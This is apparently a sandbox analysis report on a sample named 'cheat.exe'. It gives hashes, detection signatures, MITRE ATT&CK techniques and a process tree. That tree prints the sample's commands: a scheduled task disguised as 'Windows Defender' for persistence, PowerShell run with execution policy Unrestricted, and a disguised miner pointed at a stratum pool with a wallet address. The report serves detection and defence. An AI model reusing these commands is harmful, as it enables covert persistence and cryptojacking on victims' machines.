592ea2c548c74f9778a17ac78eba08eb7bfde214d690a7e593731fdbd604c877

Analysis

max time kernel
145s
max time network
42s
platform
windows7_x64
resource
win7v20210408
submitted
10-08-2021 11:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cheat.exe
Size

12.2MB
MD5

69c885675b1b98e2fbb3f0196a1df2d1
SHA1

533fa79f3b20623ae1c6de3fded5fb54b145af6a
SHA256

73bcd67ddecc7bf320a19bd5dbefdb36c097c3047959d67e0e3cc5e22f8b510b
SHA512

8b89b0a456e9d423c7e0d053772716f2e0e7877bff250e08f788d20b20fcb00bb6da831f59a781964ede23f9de74b5afcda0183d104fca523b392a89d063e44c

Score

9^/10

miner vmprotect

Malware Config

Signatures

Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
miner

Executes dropped EXE 26 IoCs

pid	Process
1456	d.exe
1628	Start.exe
872	Defender.exe
1584	Defender.exe
1912	Defender.exe
920	Defender.exe
1704	Defender.exe
816	Defender.exe
1756	Defender.exe
1644	Defender.exe
1536	Defender.exe
316	Defender.exe
1904	Defender.exe
1068	Defender.exe
944	Defender.exe
1440	Defender.exe
980	Defender.exe
1564	Defender.exe
1908	Defender.exe
908	Defender.exe
1072	Defender.exe
1492	Defender.exe
1672	Defender.exe
1220	Defender.exe
564	Defender.exe
1472	Defender.exe

VMProtect packed file 64 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral21/files/0x00030000000130dc-119.dat	vmprotect
behavioral21/files/0x00030000000130dc-118.dat	vmprotect
behavioral21/files/0x00030000000130dc-121.dat	vmprotect
behavioral21/files/0x00030000000130dc-122.dat	vmprotect
behavioral21/memory/872-123-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral21/files/0x00030000000130dc-128.dat	vmprotect
behavioral21/files/0x00030000000130dc-129.dat	vmprotect
behavioral21/memory/1584-130-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral21/files/0x00030000000130dc-134.dat	vmprotect
behavioral21/files/0x00030000000130dc-135.dat	vmprotect
behavioral21/memory/1912-136-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral21/files/0x00030000000130dc-140.dat	vmprotect
behavioral21/files/0x00030000000130dc-141.dat	vmprotect
behavioral21/memory/920-142-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral21/files/0x00030000000130dc-146.dat	vmprotect
behavioral21/files/0x00030000000130dc-147.dat	vmprotect
behavioral21/memory/1704-148-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral21/files/0x00030000000130dc-152.dat	vmprotect
behavioral21/files/0x00030000000130dc-153.dat	vmprotect
behavioral21/memory/816-154-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral21/files/0x00030000000130dc-158.dat	vmprotect
behavioral21/files/0x00030000000130dc-159.dat	vmprotect
behavioral21/memory/1756-160-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral21/files/0x00030000000130dc-164.dat	vmprotect
behavioral21/files/0x00030000000130dc-165.dat	vmprotect
behavioral21/memory/1644-166-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral21/files/0x00030000000130dc-170.dat	vmprotect
behavioral21/files/0x00030000000130dc-171.dat	vmprotect
behavioral21/memory/1536-172-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral21/files/0x00030000000130dc-176.dat	vmprotect
behavioral21/files/0x00030000000130dc-177.dat	vmprotect
behavioral21/memory/316-178-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral21/files/0x00030000000130dc-182.dat	vmprotect
behavioral21/files/0x00030000000130dc-183.dat	vmprotect
behavioral21/memory/1904-184-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral21/files/0x00030000000130dc-188.dat	vmprotect
behavioral21/files/0x00030000000130dc-189.dat	vmprotect
behavioral21/memory/1068-190-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral21/files/0x00030000000130dc-194.dat	vmprotect
behavioral21/files/0x00030000000130dc-195.dat	vmprotect
behavioral21/memory/944-196-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral21/files/0x00030000000130dc-200.dat	vmprotect
behavioral21/files/0x00030000000130dc-201.dat	vmprotect
behavioral21/memory/1440-202-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral21/files/0x00030000000130dc-206.dat	vmprotect
behavioral21/files/0x00030000000130dc-207.dat	vmprotect
behavioral21/memory/980-208-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral21/files/0x00030000000130dc-212.dat	vmprotect
behavioral21/files/0x00030000000130dc-213.dat	vmprotect
behavioral21/memory/1564-214-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral21/files/0x00030000000130dc-218.dat	vmprotect
behavioral21/files/0x00030000000130dc-219.dat	vmprotect
behavioral21/memory/1908-220-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral21/files/0x00030000000130dc-224.dat	vmprotect
behavioral21/files/0x00030000000130dc-225.dat	vmprotect
behavioral21/files/0x00030000000130dc-230.dat	vmprotect
behavioral21/files/0x00030000000130dc-231.dat	vmprotect
behavioral21/files/0x00030000000130dc-236.dat	vmprotect
behavioral21/files/0x00030000000130dc-237.dat	vmprotect
behavioral21/files/0x00030000000130dc-242.dat	vmprotect
behavioral21/files/0x00030000000130dc-243.dat	vmprotect
behavioral21/files/0x00030000000130dc-248.dat	vmprotect
behavioral21/files/0x00030000000130dc-249.dat	vmprotect
behavioral21/files/0x00030000000130dc-254.dat	vmprotect

Loads dropped DLL 28 IoCs

pid	Process
1276	WScript.exe
760	cheat.exe
760	cheat.exe
1944	WScript.exe
952	Process not Found
692	Process not Found
1920	Process not Found
1808	Process not Found
1160	Process not Found
616	Process not Found
1496	Process not Found
552	Process not Found
1360	Process not Found
304	Process not Found
928	Process not Found
1160	Process not Found
1536	Process not Found
1252	Process not Found
564	Process not Found
1728	Process not Found
2044	Process not Found
976	Process not Found
1876	Process not Found
1728	Process not Found
944	Process not Found
976	Process not Found
520	Process not Found
516	Process not Found

Suspicious use of NtSetInformationThreadHideFromDebugger 24 IoCs

pid	Process
872	Defender.exe
1584	Defender.exe
1912	Defender.exe
920	Defender.exe
1704	Defender.exe
816	Defender.exe
1756	Defender.exe
1644	Defender.exe
1536	Defender.exe
316	Defender.exe
1904	Defender.exe
1068	Defender.exe
944	Defender.exe
1440	Defender.exe
980	Defender.exe
1564	Defender.exe
1908	Defender.exe
908	Defender.exe
1072	Defender.exe
1492	Defender.exe
1672	Defender.exe
1220	Defender.exe
564	Defender.exe
1472	Defender.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1108	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2008	timeout.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
844	powershell.exe
844	powershell.exe
844	powershell.exe
844	powershell.exe
844	powershell.exe
872	Defender.exe
844	powershell.exe
844	powershell.exe
1584	Defender.exe
844	powershell.exe
844	powershell.exe
844	powershell.exe
1912	Defender.exe
844	powershell.exe
844	powershell.exe
920	Defender.exe
844	powershell.exe
844	powershell.exe
844	powershell.exe
1704	Defender.exe
844	powershell.exe
844	powershell.exe
816	Defender.exe
844	powershell.exe
844	powershell.exe
844	powershell.exe
1756	Defender.exe
844	powershell.exe
844	powershell.exe
1644	Defender.exe
844	powershell.exe
844	powershell.exe
844	powershell.exe
1536	Defender.exe
844	powershell.exe
844	powershell.exe
844	powershell.exe
316	Defender.exe
844	powershell.exe
844	powershell.exe
1904	Defender.exe
844	powershell.exe
844	powershell.exe
844	powershell.exe
1068	Defender.exe
844	powershell.exe
844	powershell.exe
944	Defender.exe
844	powershell.exe
844	powershell.exe
844	powershell.exe
1440	Defender.exe
844	powershell.exe
844	powershell.exe
980	Defender.exe
844	powershell.exe
844	powershell.exe
844	powershell.exe
1564	Defender.exe
844	powershell.exe
844	powershell.exe
844	powershell.exe
1908	Defender.exe
844	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	844	powershell.exe

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
872	Defender.exe
872	Defender.exe
872	Defender.exe
872	Defender.exe
872	Defender.exe
1584	Defender.exe
1584	Defender.exe
1584	Defender.exe
1584	Defender.exe
1584	Defender.exe
1912	Defender.exe
1912	Defender.exe
1912	Defender.exe
1912	Defender.exe
1912	Defender.exe
920	Defender.exe
920	Defender.exe
920	Defender.exe
920	Defender.exe
920	Defender.exe
1704	Defender.exe
1704	Defender.exe
1704	Defender.exe
1704	Defender.exe
1704	Defender.exe
816	Defender.exe
816	Defender.exe
816	Defender.exe
816	Defender.exe
816	Defender.exe
1756	Defender.exe
1756	Defender.exe
1756	Defender.exe
1756	Defender.exe
1756	Defender.exe
1644	Defender.exe
1644	Defender.exe
1644	Defender.exe
1644	Defender.exe
1644	Defender.exe
1536	Defender.exe
1536	Defender.exe
1536	Defender.exe
1536	Defender.exe
1536	Defender.exe
316	Defender.exe
316	Defender.exe
316	Defender.exe
316	Defender.exe
316	Defender.exe
1904	Defender.exe
1904	Defender.exe
1904	Defender.exe
1904	Defender.exe
1904	Defender.exe
1068	Defender.exe
1068	Defender.exe
1068	Defender.exe
1068	Defender.exe
1068	Defender.exe
944	Defender.exe
944	Defender.exe
944	Defender.exe
944	Defender.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 760 wrote to memory of 1276	760	cheat.exe	29
PID 760 wrote to memory of 1276	760	cheat.exe	29
PID 760 wrote to memory of 1276	760	cheat.exe	29
PID 1276 wrote to memory of 1456	1276	WScript.exe	30
PID 1276 wrote to memory of 1456	1276	WScript.exe	30
PID 1276 wrote to memory of 1456	1276	WScript.exe	30
PID 1276 wrote to memory of 1740	1276	WScript.exe	31
PID 1276 wrote to memory of 1740	1276	WScript.exe	31
PID 1276 wrote to memory of 1740	1276	WScript.exe	31
PID 1740 wrote to memory of 1108	1740	cmd.exe	33
PID 1740 wrote to memory of 1108	1740	cmd.exe	33
PID 1740 wrote to memory of 1108	1740	cmd.exe	33
PID 760 wrote to memory of 1628	760	cheat.exe	34
PID 760 wrote to memory of 1628	760	cheat.exe	34
PID 760 wrote to memory of 1628	760	cheat.exe	34
PID 1628 wrote to memory of 436	1628	Start.exe	35
PID 1628 wrote to memory of 436	1628	Start.exe	35
PID 1628 wrote to memory of 436	1628	Start.exe	35
PID 436 wrote to memory of 2008	436	cmd.exe	37
PID 436 wrote to memory of 2008	436	cmd.exe	37
PID 436 wrote to memory of 2008	436	cmd.exe	37
PID 436 wrote to memory of 844	436	cmd.exe	38
PID 436 wrote to memory of 844	436	cmd.exe	38
PID 436 wrote to memory of 844	436	cmd.exe	38
PID 844 wrote to memory of 1712	844	powershell.exe	39
PID 844 wrote to memory of 1712	844	powershell.exe	39
PID 844 wrote to memory of 1712	844	powershell.exe	39
PID 1712 wrote to memory of 2016	1712	csc.exe	40
PID 1712 wrote to memory of 2016	1712	csc.exe	40
PID 1712 wrote to memory of 2016	1712	csc.exe	40
PID 844 wrote to memory of 1944	844	powershell.exe	41
PID 844 wrote to memory of 1944	844	powershell.exe	41
PID 844 wrote to memory of 1944	844	powershell.exe	41
PID 1944 wrote to memory of 872	1944	WScript.exe	42
PID 1944 wrote to memory of 872	1944	WScript.exe	42
PID 1944 wrote to memory of 872	1944	WScript.exe	42
PID 844 wrote to memory of 1800	844	powershell.exe	44
PID 844 wrote to memory of 1800	844	powershell.exe	44
PID 844 wrote to memory of 1800	844	powershell.exe	44
PID 1800 wrote to memory of 1584	1800	WScript.exe	45
PID 1800 wrote to memory of 1584	1800	WScript.exe	45
PID 1800 wrote to memory of 1584	1800	WScript.exe	45
PID 844 wrote to memory of 300	844	powershell.exe	47
PID 844 wrote to memory of 300	844	powershell.exe	47
PID 844 wrote to memory of 300	844	powershell.exe	47
PID 300 wrote to memory of 1912	300	WScript.exe	48
PID 300 wrote to memory of 1912	300	WScript.exe	48
PID 300 wrote to memory of 1912	300	WScript.exe	48
PID 844 wrote to memory of 552	844	powershell.exe	50
PID 844 wrote to memory of 552	844	powershell.exe	50
PID 844 wrote to memory of 552	844	powershell.exe	50
PID 552 wrote to memory of 920	552	WScript.exe	51
PID 552 wrote to memory of 920	552	WScript.exe	51
PID 552 wrote to memory of 920	552	WScript.exe	51
PID 844 wrote to memory of 1500	844	powershell.exe	53
PID 844 wrote to memory of 1500	844	powershell.exe	53
PID 844 wrote to memory of 1500	844	powershell.exe	53
PID 1500 wrote to memory of 1704	1500	WScript.exe	54
PID 1500 wrote to memory of 1704	1500	WScript.exe	54
PID 1500 wrote to memory of 1704	1500	WScript.exe	54
PID 844 wrote to memory of 1740	844	powershell.exe	56
PID 844 wrote to memory of 1740	844	powershell.exe	56
PID 844 wrote to memory of 1740	844	powershell.exe	56
PID 1740 wrote to memory of 816	1740	WScript.exe	57

C:\Users\Admin\AppData\Local\Temp\cheat.exe
"C:\Users\Admin\AppData\Local\Temp\cheat.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:760
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\d.vbs"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1276
- - C:\ProgramData\Windows\d.exe
    "C:\ProgramData\Windows\d.exe" 61 C:\ProgramData\Windows\d.bat
    3⤵
    - Executes dropped EXE
    PID:1456
- - C:\Windows\System32\cmd.exe
    cmd /c ""C:\ProgramData\Windows\t.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1740
  - - C:\Windows\system32\schtasks.exe
      SCHTASKS /CREATE /SC ONLOGON /TN "Windows Defender" /TR "C:\ProgramData\Windows\Start.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:1108
- C:\ProgramData\Windows\Start.exe
  C:\ProgramData\Windows\Start.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1628
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6104.tmp\6105.tmp\6106.bat C:\ProgramData\Windows\Start.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:436
  - - C:\Windows\system32\timeout.exe
      timeout /t 10
      4⤵
      Delays execution with timeout.exe
      PID:2008
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -executionpolicy Unrestricted C:\ProgramData\Windows\timeout.ps1
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:844
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cxg51vvr\cxg51vvr.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1712
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES92CD.tmp" "c:\Users\Admin\AppData\Local\Temp\cxg51vvr\CSC21A0702B4C554B719DB9DFC669D6DB1.TMP"
        6⤵
        
        PID:2016
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:1944
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:872
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1800
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1584
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:300
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1912
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:552
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:920
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1500
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1704
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1740
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:816
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:1228
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1756
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:1796
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1644
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:1648
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1536
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:1936
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:316
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:1328
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1904
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:1236
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1068
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:1784
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:944
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:1076
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:1440
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:984
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:980
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:760
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:1564
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:1704
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:1908
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:1784
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:908
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:1888
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:1072
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:556
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:1492
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:1020
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:1672
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:1468
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:1220
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:1992
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:564
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:1668
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:1472

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/316-178-0x0000000140000000-0x0000000141B19000-memory.dmp

Filesize
27.1MB

Download
memory/760-59-0x000007FEFB531000-0x000007FEFB533000-memory.dmp

Filesize
8KB

Download
